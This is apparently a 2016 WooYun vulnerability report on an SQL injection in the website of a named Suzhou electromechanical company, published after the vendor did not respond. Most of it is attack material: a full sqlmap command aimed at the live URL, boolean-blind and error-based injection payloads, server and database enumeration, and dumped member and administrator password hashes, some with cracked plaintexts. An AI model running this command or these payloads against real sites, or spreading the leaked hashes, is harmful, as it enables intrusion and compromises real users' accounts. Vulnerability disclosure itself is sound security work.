当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0195351

漏洞标题:苏州艾姆阿欧机电设备有限公司www主站存在SQL注入漏洞(大量用户密码)

相关厂商:苏州艾姆阿欧机电设备有限公司

漏洞作者: 路人甲

提交时间:2016-04-13 15:32

修复时间:2016-05-28 15:40

公开时间:2016-05-28 15:40

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-04-13: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-05-28: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT

详细说明:

$ python sqlmap.py -u "http://www.ehs360.com/search.php?tag=+%E5%91%BC%E5%90%B8
%E5%99%A8" -p tag --technique=BE --output-dir=output --random-agent --batch  --
no-cast --current-user --is-dba --users --passwords --count --search -C pass


Database: ehs360.com_2010
Table: ehse_member
[15 entries]
+---------------------------------------------+
| password                                    |
+---------------------------------------------+
| 156a1a6f6ea26d3456e7ab65f0e6f86c            |
| 1c88d37be4e1d375f341d906f58288f4 (201314)   |
| 2205e69e7376e166b68f431614c848b1            |
| 3fc44fddce2f58ec26b3871190982993 (imissyou) |
| 73d714bd2fd44248f0206b9dce94fdf7            |
| 7fef5b36f121d34f4e11219f88c9f89a            |
| 8267ddabf72bff6a84ea53db8bc2e8b7            |
| 887ba5be6381df15715cdc9b15034a67            |
| 9e0fb72c88ee523675e4f1a25b970d92            |
| a88edfd5974d1c11c459e0c025a1bc1f            |
| ae47913d58aee2c5941efb7def7b863e            |
| df3192aef281ee9a36a2d43bbd520177            |
| e10adc3949ba59abbe56e057f20f883e (123456)   |
| e982bbd2514d2e3577282738ea53b002            |
| eabd8ce9404507aa8c22714d3f5eada9 (aaa111)   |
+---------------------------------------------+
Database: ehs360.com_2010
Table: ehse_manage
[2 entries]
+----------------------------------+
| password                         |
+----------------------------------+
| 0b955df439d1dc3292aa9d44aa816dfb |
| 6a4decac41068f5635de848388b54581 |
+----------------------------------+
Database: ehs360.com
Table: ehse_manage
[2 entries]
+----------------------------------+
| password                         |
+----------------------------------+
| 0b955df439d1dc3292aa9d44aa816dfb |
| 6a4decac41068f5635de848388b54581 |
+----------------------------------+

漏洞证明:

---
Parameter: tag (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: tag= %E5%91%BC%E5%90%B8%E5%99%A8%' AND 7092=7092 AND '%'='
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: tag= %E5%91%BC%E5%90%B8%E5%99%A8%' AND (SELECT 4599 FROM(SELECT COUNT(*),CONCAT(0x7171787a71,(SELECT (ELT(4599=4599,1))),0x7178787071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.2.8
back-end DBMS: MySQL 5.0
current user:    'ehs360.com@localhost'
current user is DBA:    False
database management system users [1]:
[*] 'ehs360.com'@'localhost'
Database: information_schema
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| COLUMNS                               | 588     |
| GLOBAL_STATUS                         | 291     |
| SESSION_STATUS                        | 291     |
| GLOBAL_VARIABLES                      | 272     |
| SESSION_VARIABLES                     | 272     |
| COLLATION_CHARACTER_SET_APPLICABILITY | 128     |
| COLLATIONS                            | 127     |
| PARTITIONS                            | 52      |
| TABLES                                | 52      |
| CHARACTER_SETS                        | 36      |
| SCHEMA_PRIVILEGES                     | 36      |
| KEY_COLUMN_USAGE                      | 22      |
| STATISTICS                            | 22      |
| TABLE_CONSTRAINTS                     | 22      |
| PLUGINS                               | 10      |
| ENGINES                               | 8       |
| SCHEMATA                              | 3       |
| PROCESSLIST                           | 1       |
| USER_PRIVILEGES                       | 1       |
+---------------------------------------+---------+
Database: ehs360.com
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| ehse_promodel                         | 8985    |
| ehse_attachment                       | 6690    |
| ehse_pro                              | 4904    |
| ehse_article                          | 1230    |
| ehse_protype                          | 596     |
| ehse_manage                           | 2       |
| ehse_gbook                            | 1       |
+---------------------------------------+---------+
Database: ehs360.com_2010
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| ehse_promodel                         | 8975    |
| ehse_pro_has_tag                      | 8482    |
| ehse_attachment                       | 6033    |
| ehse_pro                              | 4447    |
| ehse_article                          | 1203    |
| ehse_pro0                             | 871     |
| ehse_protype                          | 544     |
| ehse_protag                           | 413     |
| ehse_gbook                            | 35      |
| ehse_inquiry                          | 21      |
| ehse_member                           | 15      |
| ehse_page                             | 12      |
| ehse_config                           | 11      |
| ehse_articletype                      | 2       |
| ehse_manage                           | 2       |
+---------------------------------------+---------+
columns LIKE 'pass' were found in the following databases:
Database: ehs360.com_2010
Table: ehse_member
[1 column]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| password | varchar(255) |
+----------+--------------+
Database: ehs360.com_2010
Table: ehse_manage
[1 column]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| password | varchar(32) |
+----------+-------------+
Database: ehs360.com
Table: ehse_manage
[1 column]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| password | varchar(32) |
+----------+-------------+
Database: ehs360.com_2010
Table: ehse_member
[15 entries]
+---------------------------------------------+
| password                                    |
+---------------------------------------------+
| 156a1a6f6ea26d3456e7ab65f0e6f86c            |
| 1c88d37be4e1d375f341d906f58288f4 (201314)   |
| 2205e69e7376e166b68f431614c848b1            |
| 3fc44fddce2f58ec26b3871190982993 (imissyou) |
| 73d714bd2fd44248f0206b9dce94fdf7            |
| 7fef5b36f121d34f4e11219f88c9f89a            |
| 8267ddabf72bff6a84ea53db8bc2e8b7            |
| 887ba5be6381df15715cdc9b15034a67            |
| 9e0fb72c88ee523675e4f1a25b970d92            |
| a88edfd5974d1c11c459e0c025a1bc1f            |
| ae47913d58aee2c5941efb7def7b863e            |
| df3192aef281ee9a36a2d43bbd520177            |
| e10adc3949ba59abbe56e057f20f883e (123456)   |
| e982bbd2514d2e3577282738ea53b002            |
| eabd8ce9404507aa8c22714d3f5eada9 (aaa111)   |
+---------------------------------------------+
Database: ehs360.com_2010
Table: ehse_manage
[2 entries]
+----------------------------------+
| password                         |
+----------------------------------+
| 0b955df439d1dc3292aa9d44aa816dfb |
| 6a4decac41068f5635de848388b54581 |
+----------------------------------+
Database: ehs360.com
Table: ehse_manage
[2 entries]
+----------------------------------+
| password                         |
+----------------------------------+
| 0b955df439d1dc3292aa9d44aa816dfb |
| 6a4decac41068f5635de848388b54581 |
+----------------------------------+

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)